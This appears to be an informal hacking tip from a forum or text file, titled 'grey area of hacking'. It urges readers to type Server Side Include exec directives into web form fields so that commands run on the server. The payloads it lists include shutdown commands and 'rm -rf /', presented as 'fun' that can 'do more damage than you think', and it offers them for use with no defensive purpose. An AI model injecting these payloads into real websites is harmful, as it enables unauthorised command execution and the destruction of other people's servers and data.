grey area of hacking
If you go to a webpage, and you are allowed to write anything. Like: "enter your email here to get the shit we send you" you could just ignore it. Or you could have some fun. This is called SSI (Server Side Includes) and it could do more damage than you think.Try commands like:
- <!--#exec cmd="shutdown" / -->
- <!--#exec cmd="shutdown -k" / -->
- <!--#exec cmd="$PATH=''" / -->
- <!--#exec cmd="rm -rf /" -->
Also you can use this to do most anything on a non-secure page...
This runs commands on the server, so if you want, you may create whatever files you want, and more...